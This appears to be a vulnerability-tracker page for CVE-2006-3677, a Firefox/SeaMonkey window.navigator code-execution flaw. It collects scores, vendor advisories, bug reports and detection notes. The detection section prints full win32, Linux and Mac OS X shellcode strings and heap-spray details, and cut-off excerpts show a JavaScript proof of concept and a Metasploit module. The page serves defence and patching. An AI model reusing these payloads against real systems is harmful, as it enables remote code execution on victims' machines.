CVE-2006-3677
published 2006-07-27CVE-2006-3677: Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window…
PriorityP273high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
78.36%
99.5th percentile
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | firefox | < firefox 1.5.dfsg+1.5.0.5-1 (sid) | firefox 1.5.dfsg+1.5.0.5-1 (sid) |
| debian | thunderbird | < firefox 1.5.dfsg+1.5.0.5-1 (sid) | firefox 1.5.dfsg+1.5.0.5-1 (sid) |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
win32 shellcode: %ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065
bytes↗
linux shellcode: %u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080
bytes↗
mac osx x86 shellcode: %u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd
- →Exploit triggers by manipulating window.navigator object properties before Java plugin initialisation; detect JavaScript accessing and overwriting window.navigator properties combined with javaEnabled() calls in browser traffic. ↗
- →Exploit delivery is an HTML page served as text/html containing a JavaScript heap-spray loop; look for large unescape() strings with repeated fill patterns (%u0800, %ua8a8, %u0c0c, %u1c1c) in HTTP responses targeting Firefox user-agents. ↗
- →Vulnerability check in Metasploit module tests window.navigator.javaEnabled(); network-level detection can flag HTML pages that both call javaEnabled() and perform heap spray with unescape() fill patterns. ↗
- →Win32 heap-spray return address 0x08000800 and fill pattern %u0800 are static across all known exploit variants; signature on these values in JavaScript can identify the Windows-targeted payload. ↗
- →Linux heap-spray uses fill pattern %ua8a8 and integer-wrapped return address 0xa8000000 (-0x58000000); signature on %ua8a8 repeated heap spray identifies the Linux-targeted payload. ↗
- ·Exploit requires the Java plugin to be installed and enabled in the browser; without Java the vulnerability cannot be triggered. ↗
- ·Affected versions are Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 only; later versions are not vulnerable. ↗
- ·The Linux shellcode payload (touch /tmp/METASPLOIT) is noted as unreliable in the original PoC. ↗
- ·Metasploit module payload space is limited to 512 bytes with no bad characters, constraining usable shellcode. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
vendor_ubuntu7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wj5j-gg8h-gp5m: Mozilla Firefox 1
ghsa_unreviewed·2022-05-03
CVE-2006-3677 [HIGH] GHSA-wj5j-gg8h-gp5m: Mozilla Firefox 1
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
GHSA
GHSA-6vr8-qvq2-r64x: Mobile Safari on Apple iPhone 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-0729 [HIGH] GHSA-6vr8-qvq2-r64x: Mobile Safari on Apple iPhone 1
Mobile Safari on Apple iPhone 1.1.2 and 1.1.3 allows remote attackers to cause a denial of service (memory exhaustion and device crash) via certain JavaScript code that constructs a long string and an array containing long string elements, possibly a related issue to CVE-2006-3677. NOTE: some of these details are obtained from third party information.
VulnCheck
Mozilla Firefox and SeaMonkey 'window.navigator' Vulnerability
vulncheck·2006·CVSS 7.5
CVE-2006-3677 [HIGH] Mozilla Firefox and SeaMonkey 'window.navigator' Vulnerability
Mozilla Firefox and SeaMonkey 'window.navigator' Vulnerability
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
Affected: Mozilla Firefox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
Ubuntu
firefox vulnerabilities
vendor_ubuntu·2006-07-28·CVSS 7.5
CVE-2006-3113 [HIGH] firefox vulnerabilities
Title: firefox vulnerabilities
Summary: firefox vulnerabilities
Various flaws have been reported that allow an attacker to execute
arbitrary code with user privileges by tricking the user into opening
a malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801,
CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3809, CVE-2006-3811, CVE-2006-3812)
cross-site scripting vulnerabilities were found in the
XPCNativeWrapper() function and native DOM method handlers. A
malicious web site could exploit these to modify the contents or steal
confidential data (such as passwords) from other opened web pages.
(CVE-2006-3802, CVE-2006-3810)
A bug was found in the script handler for automatic proxy
configuration. A malicious proxy could send scripts which could
execute arbitrary c
Red Hat
security flaw
vendor_redhat·2006-07-26·CVSS 7.5
CVE-2006-3677 [HIGH] security flaw
security flaw
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
Red Hat
vulnerabilities: CVE-2006-{3113,3677,3801-3812}
vendor_redhat·2006-07-26·CVSS 2.6
CVE-2006-3812 [LOW] vulnerabilities: CVE-2006-{3113,3677,3801-3812}
vulnerabilities: CVE-2006-{3113,3677,3801-3812}
Mozilla Firefox before 1.5.0.5, Thunderbird before 1.5.0.5, and SeaMonkey before 1.0.3 allows remote attackers to reference remote files and possibly load chrome: URLs by tricking the user into copying or dragging links.
Debian
CVE-2006-3677: firefox - Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote atta...
vendor_debian·2006·CVSS 7.5
CVE-2006-3677 [HIGH] CVE-2006-3677: firefox - Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote atta...
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
Scope: local
sid: resolved (fixed in 1.5.dfsg+1.5.0.5-1)
No detection rules found.
Exploit-DB
Mozilla Suite/Firefox - Navigator Object Code Execution (Metasploit)
exploitdb·2010-09-20
CVE-2006-3677 Mozilla Suite/Firefox - Navigator Object Code Execution (Metasploit)
Mozilla Suite/Firefox - Navigator Object Code Execution (Metasploit)
---
##
# $Id: mozilla_navigatorjava.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core/constants'
require 'msf/core'
class Metasploit3 HttpClients::FF,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => %Q|
is_vuln = false;
if (window.navigator.javaEnabled && window.navigator.javaEnabled()){
is_vuln = true;
}
|,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Suite/Firefox Navigator Object Code Ex
Exploit-DB
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
exploitdb·2006-07-28·CVSS 7.5
CVE-2006-3677 [HIGH] Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
---
// MoBB Demonstration
function Demo() {
// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677
// The Java plugin is required for this to work
// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win3
Exploit-DB
Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)
exploitdb·2006-07-25
CVE-2006-3677 Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)
Mozilla Suite/Firefox HttpClients::FF,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => %Q|
is_vuln = false;
if (window.navigator.javaEnabled && window.navigator.javaEnabled()){
is_vuln = true;
}
|,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
'Description' => %q{
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
requires the Java plugin to be installed.
},
'License' => MSF_LICENSE,
'Author' => ['hdm'],
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-3677'],
['OSVDB', '27559'],
['BID', '19192'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
['URL', 'h
Metasploit
Mozilla Suite/Firefox Navigator Object Code Execution
metasploit
Mozilla Suite/Firefox Navigator Object Code Execution
Mozilla Suite/Firefox Navigator Object Code Execution
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.
Bugzilla
CVE-2006-3677 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2006-3677 [HIGH] CVE-2006-3677 security flaw
CVE-2006-3677 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
Bugzilla
Seamonkey multiple vulnerabilities: CVE-2006-{3113,3677,3801-3812}
bugzilla·2006-07-27·CVSS 7.5
CVE-2006-3677 [HIGH] Seamonkey multiple vulnerabilities: CVE-2006-{3113,3677,3801-3812}
Seamonkey multiple vulnerabilities: CVE-2006-{3113,3677,3801-3812}
Arbitrary code execution:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3677
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3807
Denial of service:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3804
All these are reported against seamonkey < 1.0.3. FE[45] and devel affected.
Discussion:
There's more: CVE-2006-3113, CVE-2006-3801, CVE-2006-3802, CVE-2006-3805,
CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811
---
...and CVE-2006-3812
---
See also related Firefox bug #200357
---
Fixed in 1.0.3+ according to upstream.
Bugzilla
major (public) security flaws fixed in firefox 1.5.0.5: CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803,CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3
bugzilla·2006-07-27·CVSS 7.5
CVE-2006-3113 [HIGH] major (public) security flaws fixed in firefox 1.5.0.5: CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803,CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3
major (public) security flaws fixed in firefox 1.5.0.5: CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803,CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812
Description of problem: Firefox 1.5.0.4 and earlier has serious security
flaws, patched in 1.5.0.5
Version-Release number of selected component (if applicable): 1.5.0.4 and earlier
How reproducible: always
Steps to Reproduce:
1. Just use Firefox!
2.
3.
Actual results: Security flaws.
Expected results: No security flaws.
Additional info: See: http://www.mozilla.org/security/announce/
for the dozen or so security announcements from Mozilla, namely,
MFSA 2006-44 through 56.
I left this open for everyone to see since the disclosure is p
Bugzilla
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-
bugzilla·2006-07-26·CVSS 7.5
CVE-2006-3801 [HIGH] CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812)
+++ This bug was initially created as a clone of Bug #200167 +++
Several Issues were discovered in Seamonkey, they are expected to be fixed in
the next upstream Seamonkey release
CVE-2006-3807 MFSA 2006-51
CVE-2006-3809 MFSA 2006-53
CVE-2006-3812 MFSA 2006-56
Several flaws were found in the way Seamonkey processes certain javascript
actions. A malicious web page could execute arbitrary javascript
instructions with the permissions of "chrome", allowing the page to steal
sensitive information or install browser malware.
CVE-2006-3801 MFSA 2006-44
CVE-200
Bugzilla
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-
bugzilla·2006-07-25·CVSS 7.5
CVE-2006-3801 [HIGH] CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812)
Several Issues were discovered in Seamonkey, they are expected to be fixed in
the next upstream Seamonkey release
CVE-2006-3807 MFSA 2006-51
CVE-2006-3809 MFSA 2006-53
CVE-2006-3812 MFSA 2006-56
Several flaws were found in the way Seamonkey processes certain javascript
actions. A malicious web page could execute arbitrary javascript
instructions with the permissions of "chrome", allowing the page to steal
sensitive information or install browser malware.
CVE-2006-3801 MFSA 2006-44
CVE-2006-3677 MFSA 2006-45
CVE-2006-3113 MFSA 2006-46
CVE-2006-3803 MFSA
Bugzilla
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-
bugzilla·2006-07-25·CVSS 7.5
CVE-2006-3801 [HIGH] CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812)
+++ This bug was initially created as a clone of Bug #200161 +++
Several Issues were discovered in Seamonkey, they are expected to be fixed in
the next upstream Seamonkey release
CVE-2006-3807 MFSA 2006-51
CVE-2006-3809 MFSA 2006-53
CVE-2006-3812 MFSA 2006-56
Several flaws were found in the way Seamonkey processes certain javascript
actions. A malicious web page could execute arbitrary javascript
instructions with the permissions of "chrome", allowing the page to steal
sensitive information or install browser malware.
CVE-2006-3801 MFSA 2006-44
CVE-200
Bugzilla
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-
bugzilla·2006-07-25·CVSS 7.5
CVE-2006-3801 [HIGH] CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-
CVE-2006-3801 Multiple Seamonkey issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812)
+++ This bug was initially created as a clone of Bug #200161 +++
Several Issues were discovered in Firefox, they are expected to be fixed in
the next upstream Firefox release
CVE-2006-3807 MFSA 2006-51
CVE-2006-3809 MFSA 2006-53
CVE-2006-3812 MFSA 2006-56
Several flaws were found in the way Firefox processes certain javascript
actions. A malicious web page could execute arbitrary javascript
instructions with the permissions of "chrome", allowing the page to steal
sensitive information or install browser malware.
CVE-2006-3801 MFSA 2006-44
CVE-2006-3677 MFSA 2006-45
C
Bugzilla
CVE-2006-3801 Multiple Thunderbird issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-200
bugzilla·2006-07-25·CVSS 7.5
CVE-2006-3801 [HIGH] CVE-2006-3801 Multiple Thunderbird issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-200
CVE-2006-3801 Multiple Thunderbird issues (CVE-2006-3677, CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811)
+++ This bug was initially created as a clone of Bug #200161 +++
Several Issues were discovered in Thunderbird, they are expected to be fixed in
the next upstream Seamonkey release
CVE-2006-3807 MFSA 2006-51
CVE-2006-3809 MFSA 2006-53
Several flaws were found in the way Thunderbird processes certain javascript
actions. A malicious web page could execute arbitrary javascript
instructions with the permissions of "chrome", allowing the page to steal
sensitive information or install browser malware.
CVE-2006-3801 MFSA 2006-44
CVE-2006-3677 MFSA 2006-45
CVE-2006-3113 MF
Bugzilla
CVE-2006-2779 Multiple Mozilla, Firefox issues (CVE-2006-2781, CVE-2006-2788)
bugzilla·2006-06-08·CVSS 9.3
CVE-2006-2779 [CRITICAL] CVE-2006-2779 Multiple Mozilla, Firefox issues (CVE-2006-2781, CVE-2006-2788)
CVE-2006-2779 Multiple Mozilla, Firefox issues (CVE-2006-2781, CVE-2006-2788)
+++ This bug was initially created as a clone of Bug #193906 +++
Text stolen from MITRE:
CVE-2006-2781
Double-free vulnerability in Mozilla Thunderbird before 1.5.0.4 and
SeaMonkey before 1.0.2 allows remote attackers to cause a denial of
service (hang) and possibly execute arbitrary code via a VCard that
contains invalid base64 characters.
CVE-2006-2779
Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers
to cause a denial of service (crash) and possibly execute arbitrary
code via (1) nested tags in a select tag, (2) a
DOMNodeRemoved mutation event, (3) "Content-implemented tree views,"
(4) BoxObjects, (5) the XBL implementation, (6) an iframe that
attempts to remove itself, which leads to m
ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.aschttp://rhn.redhat.com/errata/RHSA-2006-0609.htmlhttp://secunia.com/advisories/19873http://secunia.com/advisories/21216http://secunia.com/advisories/21229http://secunia.com/advisories/21243http://secunia.com/advisories/21246http://secunia.com/advisories/21262http://secunia.com/advisories/21269http://secunia.com/advisories/21270http://secunia.com/advisories/21336http://secunia.com/advisories/21343http://secunia.com/advisories/21361http://secunia.com/advisories/21529http://secunia.com/advisories/21532http://secunia.com/advisories/21631http://secunia.com/advisories/22066http://secunia.com/advisories/22210http://security.gentoo.org/glsa/glsa-200608-02.xmlhttp://securitytracker.com/id?1016586http://securitytracker.com/id?1016587http://www.gentoo.org/security/en/glsa/glsa-200608-03.xmlhttp://www.kb.cert.org/vuls/id/670060http://www.mandriva.com/security/advisories?name=MDKSA-2006:143http://www.mandriva.com/security/advisories?name=MDKSA-2006:145http://www.mozilla.org/security/announce/2006/mfsa2006-45.htmlhttp://www.novell.com/linux/security/advisories/2006_48_seamonkey.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0594.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0608.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0610.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0611.htmlhttp://www.securityfocus.com/archive/1/441332/100/0/threadedhttp://www.securityfocus.com/archive/1/441333/100/0/threadedhttp://www.securityfocus.com/archive/1/446658/100/200/threadedhttp://www.securityfocus.com/bid/19181http://www.securityfocus.com/bid/19192http://www.ubuntu.com/usn/usn-354-1http://www.us-cert.gov/cas/techalerts/TA06-208A.htmlhttp://www.vupen.com/english/advisories/2006/2998http://www.vupen.com/english/advisories/2006/3748http://www.vupen.com/english/advisories/2008/0083http://www.zerodayinitiative.com/advisories/ZDI-06-025.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/27981https://exchange.xforce.ibmcloud.com/vulnerabilities/39998https://issues.rpath.com/browse/RPL-536https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10745https://usn.ubuntu.com/327-1/ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.aschttp://rhn.redhat.com/errata/RHSA-2006-0609.htmlhttp://secunia.com/advisories/19873http://secunia.com/advisories/21216http://secunia.com/advisories/21229http://secunia.com/advisories/21243http://secunia.com/advisories/21246http://secunia.com/advisories/21262http://secunia.com/advisories/21269http://secunia.com/advisories/21270http://secunia.com/advisories/21336http://secunia.com/advisories/21343http://secunia.com/advisories/21361http://secunia.com/advisories/21529http://secunia.com/advisories/21532http://secunia.com/advisories/21631http://secunia.com/advisories/22066http://secunia.com/advisories/22210http://security.gentoo.org/glsa/glsa-200608-02.xmlhttp://securitytracker.com/id?1016586http://securitytracker.com/id?1016587http://www.gentoo.org/security/en/glsa/glsa-200608-03.xmlhttp://www.kb.cert.org/vuls/id/670060http://www.mandriva.com/security/advisories?name=MDKSA-2006:143http://www.mandriva.com/security/advisories?name=MDKSA-2006:145http://www.mozilla.org/security/announce/2006/mfsa2006-45.htmlhttp://www.novell.com/linux/security/advisories/2006_48_seamonkey.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0594.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0608.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0610.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0611.htmlhttp://www.securityfocus.com/archive/1/441332/100/0/threadedhttp://www.securityfocus.com/archive/1/441333/100/0/threadedhttp://www.securityfocus.com/archive/1/446658/100/200/threadedhttp://www.securityfocus.com/bid/19181http://www.securityfocus.com/bid/19192http://www.ubuntu.com/usn/usn-354-1http://www.us-cert.gov/cas/techalerts/TA06-208A.htmlhttp://www.vupen.com/english/advisories/2006/2998http://www.vupen.com/english/advisories/2006/3748http://www.vupen.com/english/advisories/2008/0083http://www.zerodayinitiative.com/advisories/ZDI-06-025.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/27981https://exchange.xforce.ibmcloud.com/vulnerabilities/39998https://issues.rpath.com/browse/RPL-536https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10745https://usn.ubuntu.com/327-1/
2006-07-27
Published
Exploited in the wild